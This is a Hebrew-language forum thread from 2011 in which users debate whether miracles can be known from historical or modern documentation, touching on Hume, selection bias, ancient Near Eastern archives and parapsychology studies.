לפיכך אפילו אם היה יום צודק בתרגיל שלו, הרי הוא רק היה טוען שאי אפשר לדעת אם יש נסים, ולא שאין נסים. אך הבעיה שהוא שוגה בשגיאה לוגית של הטיית ברירה. באופן כללי רוב המתיימרים להעביר מידע ממימד רוחני הם נוכלים, אבל אפשר להבחין בין יומרות שונות. בדיוק כמו שרוב הרופאים הם שרלטנים, אבל המיעוט (-הרופאים המערביים) פועלים בהתאם למתודה קפדנית וקשוחה ולכן הם ברי סמכא. כך יש להבחין בין יומרות שונות של מידע על מימד רוחני. בקילוף ראשון נראה כי רוב מכריע של המתיימרים אינם מספקים טיעון ברור על מקור המידע, קראתי שמעתי וצפיתי בהמון חומר של מיסטיקנים בני זמננו בעלי יומרות גדולות, כמעט ולא ראיתי רסיס אחד הנוגע בשאלת מקור המידע והדרך המשכנעת בה חילצו אותו מן השכל הפועל. בבדיקה ומיון של היומרות השונות בנוגע למימד הרוחני, התחלתי לטפל בהודעתי הראשונה. וכשיסתיים נושא זה אחזור אליו שוב בנוגע לטיעון של יציאת מצרים וכו'.

כדי שייתכן יוכל להתייחס לדברי הארוכים מכורח ריבוי הפרטים בהם יש לעסוק, אחזור על טיעוני באופן ממוספר. במדה ויש הרבה הערות לא כדאי לכתוב את כולן יחדיו, אלא לאחד את העוסקות בנושא אחד ולטפל בהן קבוצה קבוצה. שלשים הערות באדום על משפטים שונים שלי ויהיו אפילו שגויים או לא מדוייקים, הם משהו שמביא לחילופי ציטוטים אינסופיים של 'התכוונתי' 'כתבתי אחרי זה' או סתם גלישה לנישות לא חשובות. מה שאני כותב כאן זה מה שחשוב להמשך הדיון. אני לא מסכם כאן הערות משלימות צדדיות לנושא של ההודעות הקודמות.

1. טכנולוגיה מודרנית מפיצה במדינות שונות מה שהיא מגדירה כ'ידע' בהתאם להנחות היסוד שלה. אין שום קשר משום סוג בין 'אמת' חיפושה בירורה ותיעודה, לבין הטכנולוגיה של הפצת המידע. הטכנולוגיה המודרנית מאפשרת גם הפצת שקרים מתוחכמים, ובכך אינה מקרבת את האדם הממוצע ל'אמת'.

2. אנשים שמאמינים בנסים משתמשים בטכנולוגיה מודרנית לתיעוד מה שהם מפרשים כנסים, ואף אנשי מדע מתעדים בצורה מדעית תופעות על טבעיות. אין שום קשר מוכח בין עצם הטכנולוגיה המודרנית לבין האמונה בנסים, אלא אך ורק בחברה המערבית שהמטריאליזם (או מטריאליזם לייט) היתה בו השקפה דומיננטית מלכתחלה.

3. למרות הטיעון של ההתרחשויות המתוארות כנס, אין שום תיעוד יכול להוכיח נס, כי בסופו של דבר המונח 'נס' הוא כינוי לפרשנות אנושית של אירוע, ולא של אירוע.

4. דיויד יום טוען שרוב היומרות לנס הם שרלטנות ומן הסתם כולם. אך אני טוען שאם באמת יש לנו אפשרות בדבר קיומם של נסים, אין המשפט שלו עונה על השאלה, ולכל עלינו לבדוק את היומרות האלו ולראות האם באמת רובן ככולן.   

דדווח על תוכן פוגעני

נשלח ב-15/10/2011 23:31 לינק ישיר 

תוך כדי גיגול שמתי לב למשהו מדהים בכחה של התקשורת לתעד או לא לתעד דברים על טבעיים, השווה בין הכתוב בויקיפדיה בנוגע להצלחת מחקריו של ריין על טלפתיה, לבין הכתוב במקור ממנו העתיק כותב הערך  כמעט כלשונו.
הוספה: בגגלי עוד כמסת הפנאי מצאתי שיש להשוות גם את הדיווח בויקיפדיה האנגלית.

תוקן על ידי דינוזאורוס ב- 16/10/2011 00:01:22

דדווח על תוכן פוגעני

נשלח ב-15/10/2011 23:38 לינק ישיר 

דינוזאורוס כתב:

כמובן שהדמיון מביא אנשים להרבה יותר מכך, אבל אך ורק במה שנתון לפרשנות. מה שלך נראה כערפל, נראה לו כאותיות פורחות באויר. מה שנראה לך כצורה אופיינית של ברק נראה לו כקלשונו של נפטון.

כתבת עוד:

"מכאן, לעולם בו רוב תופעות הטבע נתפסו כפעולות ישירות של אילים. הנחה זו אינה נובעת מציורים וסמלים, אלא מתיעוד רב. אולי לאו דווקא מיום מתן תורה, אבל לאורך כל התקופה והרבה אחריה. יש לכך לא מעט הדים גם בתורה".

עם זה בדיוק אני מתווכח, אין שום דרך להוכיח הנחה זו, ואין שום תיעוד רב על כך, בודאי לא יותר מהתיעוד המוכיח שאנו כולנו היינו שפוטים של אסטרולוגיה. אבל איני מנסה להתעקש על כך כי זה לא ממש נוגע לטיעון שלי, אני לא בונה כלום על אחוזי האליליות או המעורבות הרגשית באמונתה, של אוכלוסיות העולם באלף השני לפנה"ס. רק רציתי להמחיש את הדעה הקדומה.

לכאורה סתרן אהדדי.

כתבת עוד:

"אין להתעלם גם מדלות אפשרות התיעוד והפצת מידע וחוסר הנגישות למידע, כולל אוריינות בסיסית, שהיה בה כדי לסייע להפיץ סיפורים ולמנוע ביקורת הכרחית, להקשות מאד על מי שבכל זאת רוצה לבקר ולהכחיש, ולהשתיק את קולות הביקורת וההכחשה אם היו".

אין ספק שבמקרה שצריכים מידע ואוריינות, יש פער של ידע בין אדם ממוצע היום לאדם ממוצע של פעם. לכן הדיון חייב להיות על מה שהאדם בהכרח יודע, לא על משהו שהוא צריך לחפש בספריות או לפצח נוסחאות וקודים מקצועיים.

אגב, גם בימי קדם היה תיעוד מסודר של החיים והאירועים, (לגבי תיעוד של צילום וכדו' אדבר להלן), בספריות האשוריות מלפני 3000 שנים ויותר נמצאו עשרות אלפי מסמכים מקוטלגים ומסודרים, אשורבניפל מנהל הספריה פיתח טכניקות לאמצעי אחסנה של המסמכים, בשלהי האלף השני לפנה"ס היתה ספריה באוגרית, במצרים, אצל החתים, הכרתים, העמים הקדומים ניהלו קודיפיקציה שמתארת בפרוטרוט אירועים, על פי לוחות שנה. גם אצלם לוו כל הפעולות במסמכים, מכירה, קניה, נישואין, גירושין, הסכמים בין אנשים, דיונים, תיאורים לאקוניים של המלך ומעשיו. ה'תיעוד' אינו המצאה מודרנית. דבר בעל ערך היה מתועד גם בימי קדם. זו סתם הערת אגב.

תיעוד מסודר היה אצל כל האימפריות הגדולות (מה גרם למה?) - מלבד אצל השבט העלוב היהודאי (וכנראה גם שבטי האזור. למרות שקשה לנו רגשית, אולי, לראות את אבותינו כהוטוטנטים מצויים - שלא ניתן להוכיח מהתרבות האמריקאית לתרבותם)... יש בידינו רק תיעוד אחד, חסר מאוד ומוטה מאוד.
וכמובן, מכל התיעודים הנרחבים של האימפריות אין זכר לתופעות הטבע האדירות שארעו לשבט (ליתר דיוק, מעצמה בגודל של מצרים עם 3 מיליון אזרחים, שיכולה לירוק לתוך יריחו במקום לתכנן אסטרטגיות או להשתמש במאגיה) הישראלי... אבל שוויה שוויה. קודם נוכיח חד משמעית שבאופן סכמטי אירועים מהסוג הזה - כאשר שאר הגורמים מוחזקים קבועים - התרחשו, ואח"כ נטפל בשאלה הזניחה: בהינתן שהם התרחשו, מה גרם למצרים/בבלים/אשורים להתעלם מהם? מה גרם לאבנים להסתדר בצורה שעושה בעיות ארכאולוגיות לטענה? שמא היה זה אותו קוסם ששתל מאובני מעבר ואור שמגיע מזמן שלא התקיים?

כמו רבים וטובים אני שואל 'מיהו יהודי'? xibulayo זה יהודי בסינית

אתייחס שוב בהרחבה לדבריך בסיום:

"אנו יודעים כי ככל שאנשים נטו יותר לבדוק ולבדוק ולבדוק וככל שהשתכללו צורות התיעוד הישיר והמשתמר, פחתו והלכו הנסים והנפלאות.              

מי כמוך יודע, כי ככל שהציבור הליטאי הלך ונדבק בחיידק הטורף של המופתים, רבו מאד המופתים המתרחשים על ידי בעלי מופת ליטאיים".

הדברים ממש שגויים, מכמה וכמה בחינות.

אבל ראשית אקדים שהשאלה אם התרחשו נסים ונפלאות באלפיים השנים האחרונות, לא נוגעת כלל לשאלה שלנו, האם יש בעולם ובאדם רק חומר, האם אלהים התגלה בסדרת נסים וציווה סדרת ציוויים. אני באופן אישי גדלתי על התרבות המערבית שמכחישה נסים, ובשבילי זו דת השכונה, אבל היא בהחלט אקסיומה שאין לה שום הוכחה ואף לא אישוש.

ונחזור למציאות: נסים ונפלאות לא פחתו, אנשים שמאמינים בניסים רואים אותם כל הזמן, מוציאים ספרים וסרטים המתעדים את המקום שאירע הנס, מראיינים את האנשים, שאירע להם הנס, זה מתרחש גם בציבור החרדי, אבל גם אצל הנוצרים, המוסלמים, ההודים, וכל מקום אחר בו מאמינים בניסים, לא תבחין בין מתאם לאנקדוטות... גגל ותמצא, הטכנולוגיה היטיבה גם עם מתעדי הנסים. יתירה מכך, דברים על טבעיים תועדו ונבדקו גם במתודות מדעיות, מה ששולל את קביעתך שככל שהתיעוד השתכלל הסיפורים פחתו, אנשי מדע מפורסמים כמו ריימונד, קיבלר-רוס, ריין, בדקו בדקדקנות ותיעדו הצלבת גירסאות רבות ושונות של חויות על טבעיות שגרמו לאנשים לספק מידע שלא יכלו לדעתו בדרך טבעית. זה שאני באופן אישי על פי דת השכונה שלי מסתייג מכך, לא משנה את העובדה בשטח שתיעוד מודרני מתעד גם ניסים. על הערך האובייקטיבי של תיעוד נסים אכתוב בסמוך.

כתבת שהטלויזיה ביטלה את הדיבוקים, והרי כולנו יודעים שזה לא נכון, האמונה בדיבוקים נחלשה מאד בחברה המערבית בתהליך שארך מאות שנים יחד עם שאר האמונות בביטויים של על טבע, בלי שום קשר לטלויזיה או לתיעוד. הטלויזיה היא סימבול, ליכולת התיעוד, הצפיה בזמן האמת, הדרישה לרפליקציה, החשיבה המדעית-ביקורתית והדרישה לבטל הסברים חילופיים. חשדתי בך שאתה אינטילגנט ומוזר שלא חשבת על זה. דרך אגב, המונח 'על-טבעי' הוא מונח חסר תוכן: ברגע שדבר מובן הוא הופך לטבעי, גם אם הוא קשור למצבי תודעה מסוימים או להתפלגות אקראית וכו'. כאשר לא יודעים מדוע קרתה תופעה מסוימת והיא עדיין לא נשלטת בידי אנשי מדעי הטבע והחיים, יכולים אנשים לנצל את אי הידיעה הזו כדי לדחוף פרשנות שאין לה שמץ הוכחה ולפעמים היא גם לא מסבירה דבר (נס! magic!). טכנית הם היו יכולים לעשות את זה גם על הוצאת אש בדרכים מסוימות, רק שעל זה המדע כבר השתלט והכפיף לנוסחאות.   

תוקן על ידי thepresent ב- 15/10/2011 23:40:47

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > דרכי הסקת מסקנות מתיעוד על המציאות
מנהל לחץ כאן לשחרור האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 ... 41 42 43 לדף הבא סך הכל 43 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.